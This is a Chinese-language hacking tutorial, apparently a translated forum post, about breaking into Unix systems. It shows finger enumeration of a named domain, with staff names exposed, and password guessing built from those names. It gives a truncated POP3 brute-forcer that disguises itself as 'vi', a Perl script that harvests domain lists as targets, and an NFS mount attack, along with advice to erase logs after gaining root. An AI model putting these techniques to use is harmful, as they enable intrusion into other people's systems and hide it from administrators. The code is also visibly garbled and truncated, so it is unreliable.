因此現(xiàn)在如果你在IRC上給某人你的login名和口令時，記住我上面說的話，不過我一直都盡量幫助人們學(xué)習(xí)啦，因此我可以說我對待碰見的朋友都是真誠老實(shí)的．
--------------------------------------------------------------------------------
困難的方法
這是另一種方法．可以確定的說，大多數(shù)的大系統(tǒng)都有用戶在使用不可靠口令．在shell環(huán)境下：
finger @domainname.com 我用真正的域名：
[10:35am][/home/ii]finger @starnet.net
[starnet.net]
Login Name Tty Idle Login Time Office Office Phone
chris Chris Myers p2 4:46 Jan 27 11:19
mike Mike Suter p1 4:57 Jan 22 16:14
mike Mike Suter p5 3d Jan 16 15:35
root System Administrator p3 4:59 Jan 16 10:17
wendt Catherine Wendt-Bern p0 3 Jan 21 14:49
[10:35am][/home/ii]
　
現(xiàn)在我們可以嘗試這樣登陸：
Login:chris Passwword 試一試：Chris，chris，myers，Myers，chrismyers，等等…
這個看起來不錯：wendt:Catherine:catherine
下面是另一個命令：
[10:35am][/home/ii]finger -l @starnet.net
[starnet.net]
Login: mike Name: Mike Suter
Directory: /usra/staff/mike Shell: /bin/csh
On since Wed Jan 22 16:14 (CST) on ttyp1， idle 5:26， from mikesbox.starnet.net
On since Thu Jan 16 15:35 (CST) on ttyp5， idle 3 days 22:00， from mikesbox
Last login Sun Jan 26 23:07 (CST) on ttyp2 from hurk
No Plan.
Login: root Name: System Administrator
Directory: /root Shell: /bin/csh
On since Thu Jan 16 10:17 (CST) on ttyp3， idle 5:28， from mikesbox.starnet.net
Last login Thu Jan 16 18:07 (CST) on ttyp6 from mikesbox.starnet.net
Mail forwarded to:
\chris@admin.starnet.net
#\chris@admin.starnet.net， \mike@admin.starnet.net
No Plan.
Login: wendt Name: Catherine Wendt-Bernal
Directory: /usra/staff/wendt Shell: /bin/csh
On since Tue Jan 21 14:49 (CST) on ttyp0， idle 0:02， from veggedout
No Plan.
你有更多可利用的消息了;)
我知道這讓你厭煩．．．
記住你的嘗試會被記錄，所以如果你成功進(jìn)入并獲得root權(quán)限的話，記得清除日志：）
以下是一個成功進(jìn)入后用得著的C小程序．
pop3hack.c
----- cut here
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* First， define the POP-3 port - almost always 110 */
#define POP3_PORT 110
/* What we want our program to be masked as， so nosy sys admin's don't kill us */
#define MASKAS "vi"
/* Repeat connect or not - remember， logs still report a connection， so
you might want to set this to 0. If set to 0， it will hack until it finds
1 user/password then exit. If set to 1， it will reconnect and try more
user/passwords (until it runs out of usernames) */
#define RECONNECT 0
----- cut here
　
你也可自己寫一小perl腳本程序，能自動finger 列表中的域名并記錄響應(yīng)信息到文件中，finger完后返回并嘗試使用pop3端口，以 用戶名-用戶名（或其他信息）方式（譯注：即口令用用戶名或其他信息）登陸，記錄響應(yīng)信息到另一文件中．（這就是Emailcrk的原理）
FTP到rs.internic.net中，在域名目錄中你會找到：
com.zone.>
--------------------------------------------------------------------------------
傳輸中斷！
ov.zone.gz
mil.zone.gz
net.zone.gz
org.zone.gz
Down下這些文檔，在攻擊目標(biāo)域名上運(yùn)行g(shù)etdomain.pl（下面的腳本），如：
"perl getdomain.pl com.zone com >com.all"
這條指令所做的就是解開所.com的域名并放在comm.all文檔中．
如果想解開.EDU，只需:
perl getdomain.pl edu.zone edu >edu.all
現(xiàn)在你就有了名為edu.all的域名列表供你用了
下面是perl 腳本:
getdomain.pl
---- cut here
#!/usr/bin/perl
# GetDomain By Nfin8 / Invisible Evil
# Questions /msg i-e or /msg i^e
#
# Retrieve command line arguments.
my($inputfile， $domain) = @ARGV;
usage() if (!defined($inputfile) || !defined($domain));
# Open and preprocess the input file.
open(INFILE， ";
# Initialize main data structure.
my(%hash) = {};
my($key) = "";
foreach (@lines) {
$key = (split(/\ /))[0];
chop($key);
next if ((($key =~ tr/.//) < 1) ||
(uc($domain) ne uc(((split(/\./， $key))[-1]))) ||
($key =~ m/root-server/i));
$hash ;
}
# Close input file and output data structure to STDOUT.
close(INFILE);
foreach (sort(keys(%hash))) {
print "?用戶名:@HackBase.net密?碼:
\n";
}
sub usage {
print("\n\ngetdomain:\n");
print("Usage: getdomain [inputfile] [search]\n\n");
print("Where [search] is one of \'com\'， \'edu\'， \'gov\'， \'mil\' or \'net\'.\n\n");
exit(0);
}
0;
---- cut here - end of script -----
要使用上述腳本，你只需把上面幾行copy下來命名為getdomain.pl，拷貝到unix系統(tǒng)中，運(yùn)行: chmod x getdomain.pl
即可．
這時就可運(yùn)行上面所講的命令行了．
--------------------------------------------------------------------------------
使用Mount得到unix系統(tǒng)訪問權(quán)限
這并不難而且網(wǎng)絡(luò)上有很多系統(tǒng)是mountable（可共享的）的．Mount是一個unix命令允許你在遠(yuǎn)程機(jī)器驅(qū)動器安裝系統(tǒng)．這樣一來，你既可從其他機(jī)器進(jìn)行安裝過程也可僅僅共享網(wǎng)絡(luò)中的磁盤和目錄．問題在于許多管理員過于精通unix命令和設(shè)置．或者是太懶惰而把磁盤設(shè)置為全局屬性，卻不明白全局mount(連接或共享)該磁盤，別人就能獲得對他們的用戶目錄的寫權(quán)限．
開始，你需要一個hack過的root帳號．為了能mount(連接或共享)遠(yuǎn)程磁盤并獲取權(quán)限，你要修改系統(tǒng)的password文檔并使用SU命令．

最新評論